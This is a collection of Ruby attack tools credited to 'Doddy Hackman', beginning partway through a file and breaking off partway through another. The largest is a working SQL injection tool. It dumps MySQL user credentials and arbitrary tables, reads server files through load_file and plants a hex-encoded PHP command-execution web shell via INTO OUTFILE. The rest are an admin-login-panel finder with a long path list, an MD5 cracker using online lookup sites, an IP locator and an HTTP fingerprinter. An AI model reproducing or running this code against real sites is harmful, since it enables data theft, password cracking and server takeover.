end
end
def mysqluser(url,by)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
print "\n[+] Searching mysql.user\n\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] Users Mysql Found : ",total,"\n\n"
savefile(url,"[+] Users Mysql Found : "+total+"\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
host,user,passw = $1,$2,$3
print "[Host] : "+host
print " [User] : "+user
print " [Pass] : "+passw+"\n"
savefile(url,"[Host] : "+host)
savefile(url,"[User] : "+user)
savefile(url,"[Pass] : "+passw+"\n")
end
end
else
print "[-] Not Found\n"
end
end
def details(url,by)
pass1,pass2 = bypass(by)
hextest = "0x2f6574632f706173737764" #/etc/passwd
hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
web1 = url.sub(/hackman/,"0x4b30425241")
web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
print "\n[+] Extrating information of the DB\n"
code1 = toma(web2)
if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
user,data,ver = $1,$2,$3
print "\n[+] Username : "+user
print "\n[+] Database : "+data
print "\n[+] Version : "+ver+"\n\n"
savefile(url,"\n[+] Username : "+user)
savefile(url,"[+] Database : "+data)
savefile(url,"[+] Version : "+ver+"\n")
else
print "[-] Not Found\n"
end
code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
code4 = toma(web3)
if code2=~/K0BRA/
print "[+] Mysql User : ON\n"
savefile(url,"[+] Mysqluser : ON")
end
if code3=~/K0BRA/
print "[+] information_schema : ON\n"
savefile(url,"[+] information_schema : ON")
end
if code4=~/ERTOR854/
print "[+] load_file : ON\n"
savefile(url,"[+] load_file : ON")
end
savefile(url,"") #espacio en blanco
end
def dumper(url,by,table,col1,col2)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
print "\n[+] Getting Values ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
savefile(url,"\n[+] Table : "+table)
savefile(url,"[+] Column 1 : "+col1)
savefile(url,"[+] Column 2 : "+col2)
print "[+] Values Found : ",total,"\n"
savefile(url,"\n[+] Values Found : #{total}\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
uno,dos = $1,$2
print "\n[+] "+col1+" : "+uno+"\n"
print "[+] "+col2+" : "+dos+"\n"
savefile(url,"\n[+] "+col1+" : "+uno)
savefile(url,"[+] "+col2+" : "+dos)
end
end
else
print "[-] Not Found\n"
end
end
def fuzzfile(url,by)
pass1,pass2 = bypass(by)
print "\n[+] Fuzzing Files with load_file ....\n"
$files.each do |file|
res = file
file = file.chomp
file = encode_hex(file)
web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
code = toma(web1)
if code=~/ERTOR854(.*?)ERTOR854/m
print "\n\n[File Found] : ",res
print "\n\n[Source Start]\n"
print $1
print "\n[Source End]"
savefile(url,"\n[File Found] : "+res)
savefile(url,"\n[Source Start]\n")
savefile(url,$1)
savefile(url,"\n[Source End]")
end
end
print "\n"
end
def abrirfile(url,by,file)
pass1,pass2 = bypass(by)
print "\n[+] Opening file ....\n"
res = file
file = encode_hex(file)
web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
code = toma(web1)
if code=~/ERTOR854(.*?)ERTOR854/m
print "\n\n[File Found] : ",res
print "\n\n[Source Start]\n"
print $1
print "\n[Source End]\n"
savefile(url,"\n[File Found] : "+res)
savefile(url,"\n[Source Start]\n")
savefile(url,$1)
savefile(url,"\n[Source End]\n")
else
print "\n\n[-] Error\n\n"
end
end
def into(url,by,full,dir)
pass1,pass2 = bypass(by)
linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
lugar = full+"/cmd.php"
lugardos = dir+"/cmd.php"
h = URI.parse(url)
webtest = "http://"+h.host+lugardos
web1 = url.sub(/hackman/,linea)
formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
toma(formandoweb)
code = toma(webtest)
if code=~/Mini Shell By Doddy/
print "\n[Shell Up] : "+webtest+"\n"
savefile(url,"\n[Shell Up] : "+webtest+"\n")
else
print "\n\n[-] Error\n"
end
end
def central(url,by)
clean()
head()
print "\n\n[+] Page : #{url}\n"
print "[+] ByPass : #{by}\n\n"
print "\n[information_schema]\n\n"
print "1 - Show tables\n"
print "2 - Show columns of the a table\n"
print "3 - Show databases\n"
print "4 - Show tables from the a DB\n"
print "5 - Show columns from the a table of the DB\n"
print "\n[mysql.user]\n\n"
print "6 - Show users\n"
print "\n[Others]\n\n"
print "7 - Show details\n"
print "8 - Dump data\n"
print "9 - Fuzz Files with load_file\n"
print "10 - Load files with load_file\n"
print "11 - Create Shell\n"
print "12 - Show log\n"
print "13 - Change target\n"
print "14 - Exit\n\n\n"
print "[+] Option : "
op = gets.chomp
print "\n"
if op == "1"
gettables(url,by)
retorno(url,by)
elsif op == "2"
print "\n[+] Table : "
table = gets.chomp
getcolumns(url,by,table)
retorno(url,by)
elsif op == "3"
getdbs(url,by)
retorno(url,by)
elsif op == "4"
print "\n[+] DB : "
db = gets.chomp
gettablesbydb(url,by,db)
retorno(url,by)
elsif op == "5"
print "\n[+] DB : "
db = gets.chomp
print "\n[+] Table : "
tab = gets.chomp
getcolumnsbydb(url,by,db,tab)
retorno(url,by)
elsif op == "6"
mysqluser(url,by)
retorno(url,by)
elsif op == "7"
details(url,by)
retorno(url,by)
elsif op == "8"
print "\n[+] Table : "
table = gets.chomp
print "\n[+] Column 1 : "
col1 = gets.chomp
print "\n[+] Column 2 : "
col2 = gets.chomp
dumper(url,by,table,col1,col2)
retorno(url,by)
elsif op == "9"
fuzzfile(url,by)
retorno(url,by)
elsif op == "10"
print "\n[+] File : "
file = gets.chomp
abrirfile(url,by,file)
retorno(url,by)
elsif op == "11"
print "\n[Full Source Discloure] : "
full = gets.chomp
print "\n[Directory to test] : "
dir = gets.chomp
into(url,by,full,dir)
retorno(url,by)
elsif op == "12"
urla = URI.parse(url)
ar = "logs_webs/"+urla.host+".txt"
system("start #{ar}")
retorno(url,by)
elsif op == "13"
inicio()
elsif op == "14"
copyright()
else
retorno(url,by)
end
end
def findlength(url,by)
pass1,pass2 = bypass(by)
z = "1"
print "\n[+] Finding columns lenght ...\n\n"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data"
z = z.sub($1,"hackman")
sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
savefile(url,"[+] SQLI : "+sqli)
savefile(url,"[+] Bypass : "+by+"\n")
central(sqli,by)
end
end
print "[-] Columns lenght not found\n"
volverinicio()
end
def testvul(page,by)
pass1,pass2 = bypass(by)
print "\n\n[+] Testing vulnerability ...\n\n"
codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
if codeuno != codedos
print "[+] Vulnerable !\n"
findlength(page,by)
else
print "[-] Not vulnerable\n"
print "\n[+] Scan anyway y/n : "
op = gets.chomp
if op == "y"
findlength(page,by)
else
volverinicio()
end
end
end
def inicio()
clean()
head()
print "\n\n[+] Page : "
page = gets.chomp
print "\n[+] Bypass : "
by = gets.chomp
if page=~/hackman/
central(page,by)
else
testvul(page,by)
end
end
installer()
inicio()
# The End ?
#!usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015
require "net/http"
# Functions
def httpfinger(page)
respuesta = ""
begin
nave = Net::HTTP.start(page)
headers = nave.head("/")
headers.each do |name,value|
respuesta = respuesta + "[+] "+name+" : "+value+"\n"
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end
def uso
print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
end
def head
print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
#
target = ARGV[0]
head()
if !target
uso()
else
print "\n[+] Searching ...\n\n"
print httpfinger(target)
print "\n[+] Finished\n"
end
copyright()
#The End ?
#!usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015
require "tk"
require "net/http"
# Functions
def httpfinger(page)
respuesta = ""
begin
nave = Net::HTTP.start(page)
headers = nave.head("/")
headers.each do |name,value|
respuesta = respuesta + "[+] "+name+" : "+value+"\n"
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end
#
window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
window['geometry'] = '300x300-20+10'
TkLabel.new(window) do
background "black"
foreground "cyan"
text " Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end
target = TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end
console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground "cyan"
command proc{
target = target.value.to_s
console.insert("end","[+] Searching ...\n\n")
console.insert("end",httpfinger(target))
console.insert("end","\n[+] Finished")
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015
require "open-uri"
require "net/http"
require "resolv"
# Functions
def get_ip(hostname)
begin
return Resolv.getaddress(hostname)
rescue
return "Error"
end
end
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def uso
print "\n[+] Sintax : ruby locateip.rb <target>\n"
end
def head
print "\n\n-- == LocateIP 0.3 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
def locateip(target)
print "\n[+] Getting IP ...\n"
ip = get_ip(target)
print "\n[+] IP : "+ip+"\n"
web = "http://www.melissadata.com/lookups/iplocation.asp"
print "\n[+] Locating ...\n\n"
code = tomar(web,"ipaddress="+ip+"&btn=Submit")
if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] City : "+$2+"\n"
else
print "[+] City : Not Found\n"
end
if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] Country : "+$2+"\n"
else
print "[+] Country : Not Found\n"
end
if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] State or Region : "+$2+"\n";
else
print "[+] State of Region : Not Found\n"
end
print "\n[+] Getting DNS ...\n\n"
control = "0"
code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
dnss = code.scan(/whois\/(.*?)\">Whois/)
dnss.flatten.each do |dns|
begin
if dns != ""
control = "1"
print "[+] DNS Found : "+dns
end
end
end
if control=="0"
print "\n[-] DNS Not Found\n"
end
end
target = ARGV[0]
head()
if !target
uso()
else
locateip(target)
end
copyright()
#The End ?
#!usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015
require "tk"
require "open-uri"
require "net/http"
require "resolv"
# Functions
def get_ip(hostname)
begin
return Resolv.getaddress(hostname)
rescue
return "Error"
end
end
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
#
window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'
TkLabel.new(window) do
background "black"
foreground "yellow"
text " Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end
target = TkEntry.new(window){
background "black"
foreground "yellow"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "yellow"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end
console =TkText.new(window) do
background "black"
foreground "yellow"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "yellow"
width 17
activebackground "yellow"
highlightbackground "yellow"
command proc{
target = target.value.to_s
console.insert("end", "[+] Getting IP ...\n")
ip = get_ip(target)
web = "http://www.melissadata.com/lookups/iplocation.asp"
console.insert("end", "\n[+] Locating ...\n\n")
code = tomar(web,"ipaddress="+ip+"&btn=Submit")
if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end", "[+] City : "+$2+"\n")
else
console.insert("end", "[+] City : Not Found\n")
end
if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end","[+] Country : "+$2+"\n")
else
console.insert("end", "[+] Country : Not Found\n")
end
if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end", "[+] State or Region : "+$2+"\n")
else
console.insert("end","[+] State of Region : Not Found\n")
end
console.insert("end","\n[+] Getting DNS ...\n\n")
control = "0"
code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
dnss = code.scan(/whois\/(.*?)\">Whois/)
dnss.flatten.each do |dns|
begin
if dns != ""
control = "1"
console.insert("end", "[+] DNS Found : "+dns)
end
end
end
if control=="0"
console.insert("end","\n[-] DNS Not Found\n")
end
console.insert("end","\n\n[+] Finished")
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def find_panel(page)
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
print "\n[+] Scanning ...\n\n"
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
print "[+] Link : "+url+"\n"
control = "1"
end
end
end
if control=="1"
print "\n[+] Finished\n"
else
print "\n[-] Not Found\n"
end
end
def uso
print "\n[+] Sintax : ruby panel_finder.rb <page>\n"
end
def head
print "\n\n-- == Panel Finder 0.5 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
page = ARGV[0]
head()
if !page
uso()
else
find_panel(page)
end
copyright()
#The End ?
#!usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015
require "tk"
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
#
window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'
TkLabel.new(window) do
background "black"
foreground "orange"
text " Page : "
place('relx'=>"0.1",'rely'=>"0.1")
end
page = TkEntry.new(window){
background "black"
foreground "orange"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "orange"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end
console =TkText.new(window) do
background "black"
foreground "orange"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "orange"
width 17
activebackground "orange"
highlightbackground "orange"
command proc{
page = page.value.to_s
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
console.insert("end", "[+] Scanning ...\n\n")
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
console.insert("end","[+] Link : "+url+"\n")
control = "1"
end
end
end
if control=="1"
console.insert("end","\n[+] Finished")
else
console.insert("end","\n[-] Not Found")
end
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def crack(md5)
print "\n[+] Cracking ...\n\n"
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/b>/
password = $1
print "[+] md5online.net -> "+password+"\n"
else
print "[-] md5online.net -> Not Found" + "\n"
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
print "[+] md5.my-addr.co -> "+password+"\n"
else
print "[-] md5.my-addr.co -> Not Found" +"\n"
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
print "[+] md5decryption.com -> "+password+"\n"
else
print "[-] md5decryption.com -> Not Found"+"\n"
end
print "\n[+] Finished"
end
def uso
print "\n[+] Sintax : ruby md5cracker.rb <md5>\n"
end
def head
print "\n\n-- == MD5 Cracker 0.2 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
#
md5 = ARGV[0]
head()
if !md5
uso()
else
crack(md5)
end
copyright()
#The End ?
#!usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015
require "tk"
require "open-uri"
require "net/http"
#Functions
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
#
window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'
TkLabel.new(window) do
background "black"
foreground "green"
text " MD5 : "
place('relx'=>"0.1",'rely'=>"0.1")
end
md5 = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end
console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end
TkButton.new(window) do
text "Crack It"
background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground "green"
command proc{
md5 = md5.value.to_s
console.insert("end","[+] Cracking ...\n\n")
